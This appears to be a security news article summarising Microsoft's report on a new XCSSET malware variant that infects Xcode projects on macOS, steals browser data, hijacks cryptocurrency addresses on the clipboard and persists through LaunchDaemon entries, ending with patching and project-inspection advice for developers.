Microsoft Threat Intelligence has sounded the alarm: a new variant of the XCSSET malware has been detected on macOS. Although it has only been seen in limited attacks so far, it arrives equipped with more advanced techniques. Among them are improved browser manipulation, clipboard hijacking, and reinforced persistence mechanisms that allow it to remain active on the system.
XCSSET is not new to the scene. It’s a modular malware that functions as both an information and cryptocurrency thief, capable of stealing notes, digital wallets, and browsing data from infected machines.
Its method of spreading is particularly dangerous: it searches for Xcode projects on the device, contaminates them, and ensures it executes every time the developer builds a project.
In Microsoft’s words: “The XCSSET malware is designed to infect Xcode projects, commonly used by software developers, and run during the build process of an application in this environment.” In short, its ability to spread through shared projects among developers makes it a silent threat with massive potential impact.
In this new variant of XCSSET, researchers have identified several changes that make it even more dangerous.
For one, the malware now specifically targets Firefox, using a modified version of HackBrowserData—an open-source tool designed to decrypt and extract stored browser data. Thanks to this modification, attackers can more easily steal sensitive data from Firefox users.
But that’s not all. The update also enhances the clipboard hijacking module. On infected macOS devices, the malware continuously monitors what the user copies and pastes. If it detects something resembling a cryptocurrency address, it automatically replaces it with one controlled by the attackers.
The result? Any cryptocurrency transfer made from a compromised device ends up in the cybercriminals’ wallets instead of reaching the intended recipient.
Attacker Cryptocurrency Addresses Used with the Clipboard Hijacker (Source: Microsoft)
Read more: New RatOn Trojan on Android Can Empty Your Bank Accounts
The malware doesn’t just steal data—it also knows how to stay hidden within the system. The new variant of XCSSET incorporates more sophisticated persistence methods, such as creating LaunchDaemon entries that execute a malicious payload called ~/.root. It even goes so far as to generate a fake System Settings application (Settings.app) in the /tmp folder to disguise its activity and remain unnoticed.
For now, the threat is not widespread. Microsoft confirms it has only been detected in limited attacks, although it has already shared the information with Apple and is working with GitHub to remove infected repositories that help spread the malware.
To stay protected, the primary recommendation is clear: always keep macOS and all applications up to date. At TecnetOne, we emphasize this point strongly, as XCSSET has previously exploited zero-day vulnerabilities—making it particularly dangerous when systems are not fully patched.
Additionally, Microsoft advises developers to thoroughly inspect Xcode projects before compiling them, especially when they come from third parties or have been shared in repositories. This remains one of the main channels through which the malware infiltrates development environments.